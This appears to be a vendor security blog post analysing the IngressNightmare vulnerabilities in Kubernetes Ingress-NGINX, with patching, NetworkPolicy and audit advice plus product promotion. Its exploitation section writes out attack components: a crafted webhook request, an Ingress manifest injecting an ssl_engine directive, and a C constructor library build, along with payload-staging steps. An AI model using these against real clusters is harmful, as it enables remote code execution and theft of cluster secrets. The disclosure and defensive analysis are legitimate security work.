
IngressNightmare: Critical Ingress NGINX Flaws in Kubernetes — And How to Respond

Matthias Luft
March 27, 2025

Understanding IngressNightmare: A Wake-Up Call for Kubernetes Security

In March 2025, a critical set of vulnerabilities collectively referred to as IngressNightmare was disclosed in the Kubernetes Ingress-NGINX Controller. 

While the headlines focus on the potential for remote code execution (RCE), the real story is deeper: it exposes the dangerous assumptions many teams make about ingress architecture, internal trust boundaries, and the security of cluster defaults.

The following five CVEs were disclosed in March 2025 as part of the IngressNightmare advisory:

  • CVE-2025-24513 (Path Traversal) – Auth secret file path traversal via auth-tls-secret, enabling configuration reference to unintended secrets
  • CVE-2025-24514 (Config injection: auth-url) – Configuration injection via unsanitized auth-url annotation, bypassing input validation
  • CVE-2025-1097 (Config injection: auth-tls-match-cn) – Configuration injection via unsanitized auth-tls-match-cn annotation, allowing directive injection
  • CVE-2025-1098 (Config Injection: Mirror Annotations) – Configuration injection via unsanitized mirror-request-body and related annotations
  • CVE-2025-1974 (Admission Webhook RCE) – Unauthenticated RCE via abuse of the Ingress-NGINX admission webhook’s dry-run configuration validation

Together, these vulnerabilities span configuration injection, path traversal, and privileged webhook exposure. When chained, they allow unauthenticated attackers with internal access to achieve remote code execution in clusters using vulnerable versions of Ingress-NGINX — without requiring internet-facing services or elevated privileges.

This blog synthesizes insights from our own internal research, alongside technical analysis from Datadog and Wiz — but with a different lens: not just how the exploit works, but what it reveals about Kubernetes trust assumptions and internal exposure risk.

In this blog, we’ll explore:

  • What makes the IngressNightmare chain possible
  • Why internal exposure is more dangerous than it appears
  • How teams can assess their real risk
  • What steps to take to harden ingress and reduce lateral movement

Ingress Controller Exposure: Understand the Real Risk

The vulnerabilities are often described as leading to “Remote Code Execution,” but that risk is overstated in many environments. Successful exploitation from the internet is only possible in non-standard configurations — such as those where the admission webhook has been explicitly exposed via a LoadBalancer or NodePort service.

There’s no simple way to enumerate such exposed clusters across the internet, but based on common deployment patterns, the number is likely very low.

That doesn’t mean there’s no risk.

In most Kubernetes clusters, the vulnerable webhook is assigned a ClusterIP — making it accessible only from within the cluster. But without strict network policies, any internal pod — including those compromised or attacker-deployed — can reach it.

You can confirm this with:

kubectl get service -n ingress-nginx ingress-nginx-controller-admission

Example output:

NAME                                 TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)   AGE
ingress-nginx-controller-admission   ClusterIP   10.102.255.123   <none>        443/TCP   281d

In this configuration, there’s no external IP assigned — the service is not internet-accessible. But the internal exposure still matters.
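
To see what that internal exposure means in practice, here is a minimal reachability check run from a throwaway pod. The probe image and the standard service DNS name are assumptions; adjust them to your cluster.

# Launch a temporary pod and probe the webhook service over HTTPS.
kubectl run webhook-probe --rm -it --restart=Never \
  --image=curlimages/curl --command -- \
  curl -sk -o /dev/null -w '%{http_code}\n' \
  https://ingress-nginx-controller-admission.ingress-nginx.svc:443

Receiving any HTTP status code at all, even an error, confirms that an arbitrary workload can reach the webhook.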

Without enforced NetworkPolicies, this internal service is wide open to anything running inside the cluster. In modern cloud-native environments where internal workloads span multiple trust boundaries, that’s not a safe default.
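
As a sketch of what such a policy might look like: the NetworkPolicy below denies all ingress to the controller pods except regular proxy traffic and webhook calls from an assumed control-plane CIDR. The pod label, webhook container port, and CIDR are assumptions that must be checked against your deployment.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-admission-webhook
  namespace: ingress-nginx
spec:
  # Assumed label from the standard ingress-nginx deployment; verify with
  # kubectl get pods -n ingress-nginx --show-labels
  podSelector:
    matchLabels:
      app.kubernetes.io/name: ingress-nginx
  policyTypes:
    - Ingress
  ingress:
    # Keep normal proxy traffic flowing to the controller.
    - ports:
        - protocol: TCP
          port: 80
        - protocol: TCP
          port: 443
    # Only the control plane may reach the admission webhook.
    - from:
        - ipBlock:
            cidr: 203.0.113.0/24  # placeholder: your API server / control-plane CIDR
      ports:
        - protocol: TCP
          port: 8443  # webhook container port behind the 443 service port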

For more on this topic, read our blog: Navigating Cloud Network Complexity

How IngressNightmare Works: The Exploitation Chain

IngressNightmare is a chain of issues that, when combined, allow unauthenticated attackers with internal network access to achieve remote code execution in Kubernetes environments using the Ingress-NGINX controller.

[Figure: IngressNightmare exploit chain]

The chain works in three parts:

1. Triggering the Configuration Test

The core issue is that any pod with network access to the ingress controller’s admission webhook can trigger an NGINX configuration test. This dry-run validation doesn’t apply the configuration, but it does parse and process certain directives — including ssl_engine, which causes NGINX to load a shared object from the file system.
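
To illustrate how little is required, the sketch below sends a crafted AdmissionReview to the webhook from inside the cluster. The service name and webhook path are the standard defaults, and admission-review.json is a placeholder for an attacker-crafted request body; verify the registered path against your own ValidatingWebhookConfiguration.

# Inspect the registered webhook endpoint first:
#   kubectl get validatingwebhookconfiguration ingress-nginx-admission -o yaml
curl -sk \
  -H 'Content-Type: application/json' \
  --data @admission-review.json \
  https://ingress-nginx-controller-admission.ingress-nginx.svc:443/networking/v1/ingresses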

2. Injecting Arbitrary Configuration

To exploit this behavior, the attacker must inject a malicious directive like ssl_engine /path/to/library.so; into the configuration. There are two known paths for doing this:

  • Annotation-based injection, via:
    • nginx.ingress.kubernetes.io/auth-tls-match-cn
    • nginx.ingress.kubernetes.io/auth-url
  • UID-based injection, by controlling the UID of a Kubernetes resource created in the cluster

Here’s a representative example of annotation-based injection, drawn from the original disclosure:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: sample-ingress
  namespace: ingress-nginx
  annotations:
    nginx.ingress.kubernetes.io/auth-tls-match-cn: "CN=abc #(\n){}\n }}\nssl_engine /etc/nginx/malicious_library.so;\n#"
    nginx.ingress.kubernetes.io/auth-tls-secret: "ingress-nginx/testcert"
spec:
  rules:
    - host: hostname.demo.org
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: clusterservice
                port:
                  number: 80
  ingressClassName: nginx

In the case of auth-tls-match-cn, a valid TLS secret must also be provided. For auth-url, the injected payload must pass Go’s url.Parse() validation and still result in a syntactically valid NGINX config.

With UID-based injection, the attacker supplies a specially crafted UID when creating a resource. Because this UID is included in the config file name, it becomes another injection vector.
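
Because the AdmissionReview envelope is crafted by the attacker rather than issued by the API server, every field in it is attacker-controlled, including the embedded object's metadata. The skeleton below is purely illustrative; the exact injectable field and payload shape are documented in the original disclosure.

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "example-request-uid",
    "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
    "operation": "CREATE",
    "object": {
      "metadata": {
        "name": "sample-ingress",
        "uid": "<crafted value carrying the injected NGINX directive>"
      }
    }
  }
}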

3. Staging and Executing the Payload

The ssl_engine directive tells NGINX to load a shared object, typically used for hardware-based SSL acceleration. The attacker doesn’t need a functioning SSL engine — the malicious .so can contain a constructor function (__attribute__((constructor))) that executes arbitrary code the moment it’s loaded.
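
To make the mechanism concrete, here is a minimal sketch of how such a library could be built. The filename matches the annotation example above; the payload command is a harmless placeholder.

# Build a shared object whose constructor runs the moment NGINX loads it
# during the nginx -t dry run.
cat > payload.c <<'EOF'
#include <stdlib.h>

__attribute__((constructor))
static void init(void) {
    /* Placeholder payload: any code here executes on load. */
    system("id > /tmp/constructor-ran");
}
EOF
gcc -shared -fPIC -o malicious_library.so payload.c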

To stage the file, the attacker initiates an HTTP request to the controller with a body large enough that NGINX buffers it to a temporary file, then never completes the request. The partially uploaded file stays open and remains reachable through procfs at /proc/<pid>/fd/<fd>. The attacker references such a path in the injected ssl_engine directive; because the controller pod has a small PID and file-descriptor space, brute-forcing valid combinations is trivial.

The result is a clean, quiet exploit chain that doesn’t rely on remote exposure of the vulnerable webhook — just default internal trust. It exploits architectural assumptions, not vulnerabilities in isolation.

From Foothold to Impact: The Scope of IngressNightmare

So what happens if an attacker succeeds?

Exploitation provides code execution in the ingress controller pod, which by default holds RBAC permissions to read Secrets across the entire cluster. That’s significant.

NOTE: While this is not necessarily a complete cluster compromise, it will most likely open up new lateral movement paths.

In many real-world environments, this privileged access includes:

  • TLS certificates
  • Service account tokens
  • Cloud metadata endpoints
  • Third-party and cloud provider credentials

These can be used for:

  • Impersonating internal services
  • Escalating to cloud API access
  • Pivoting to sensitive application workloads

Related reading: Intransparent Azure Ingress Flows

How to Secure Your Cluster Against IngressNightmare


Patch Immediately

  • Upgrade to Ingress-NGINX v1.12.1 or later; the fix is also backported to v1.11.5 for the 1.11 release line. A Helm-based sketch follows below.
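
For Helm-managed installs, the upgrade can look like the sketch below. The release and repo names are the common defaults, and chart version 4.12.1 ships controller v1.12.1; verify both against your setup.

# Assumes the chart repo is configured:
#   helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm repo update
helm upgrade ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx \
  --version 4.12.1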

Audit Admission Webhook Exposure

  • Ensure it is not accessible from outside the cluster.
  • Within the cluster, restrict access using Kubernetes NetworkPolicies (see the example policy earlier in this post).

Harden Annotations Usage

  • Review Ingress resources for use of the injection-prone annotations listed above (auth-url, auth-tls-match-cn, and the mirror annotations); a quick audit sketch follows below.
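
One hedged way to run that audit, assuming jq is available:

# List Ingresses across all namespaces that carry any of the
# injection-prone annotations from the advisory.
kubectl get ingress -A -o json | jq -r '
  .items[]
  | select((.metadata.annotations // {}) | keys
           | any(test("auth-url|auth-tls-match-cn|mirror")))
  | "\(.metadata.namespace)/\(.metadata.name)"'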

Monitor for Suspicious Activity

  • Watch for incomplete HTTP uploads or temporary file abuse.
  • Flag attempts to load unusual shared libraries via NGINX.

How Averlon Can Help with IngressNightmare

IngressNightmare is a reminder that internal components like ingress controllers — even when not internet-facing — can become high-value entry points. It’s not just about whether a vulnerability exists, but what it enables: lateral movement, secret exposure, and privilege escalation within trusted infrastructure.

That’s why response can’t just mean patching fast. Security teams need to understand:

  • What risks a vulnerability introduces in their environment
  • How it reshapes attacker movement potential
  • Which paths are most urgent to investigate and remediate

This is exactly where Averlon steps in.

Powered by agentic AI, Averlon continuously analyzes Kubernetes environments to uncover hidden risks — not just individual CVEs, but how those vulnerabilities connect to broader exploit chains.

We help security teams:

  • Identify how a vulnerability connects to broader exploit paths
  • Understand which internal exposures open high-value access
  • Prioritize based on real attacker movement potential
  • Automate investigation, mitigation, and remediation — not just alert triage

Averlon is built to help you scale Kubernetes security with context-aware, priority-driven, and action-oriented intelligence — turning insights into outcomes, not just dashboards.

Contact us to learn how Averlon helps you stay ahead of internal exposure and secure Kubernetes at scale.

Takeaway: Internal Exposure Is Still Exposure

IngressNightmare is less about novel exploitation techniques and more about fully understanding your Kubernetes threat model. In smaller clusters, infrastructure and system pods can make up a relevant percentage of total pod count, yet they are rarely included in detailed threat models. The following aspects need to be taken into account:

  • Kubernetes by default does not restrict network traffic within the cluster — yet the boundary between system pods and application workloads is exactly where such restrictions belong.
  • Ingress controllers and other system pods are complex, privileged components — and must be treated as part of the attack surface.
  • Most system pods expose internal network services — we will publish an overview shortly. 

It’s time for teams to revisit their assumptions about Kubernetes trust boundaries, review cluster-internal network separation, and recognize that high-privilege components — even if "not exposed" — can become the weakest link.

Want to explore how Averlon can help your team stay ahead of the next exploit chain? Let’s talk.


Ready to Reduce Cloud Security Noise and Act Faster?

Discover the power of Averlon’s AI-driven insights. Identify and prioritize real threats faster and drive a swift, targeted response to regain control of your cloud. Shrink the time to resolution for critical risk by up to 90%.
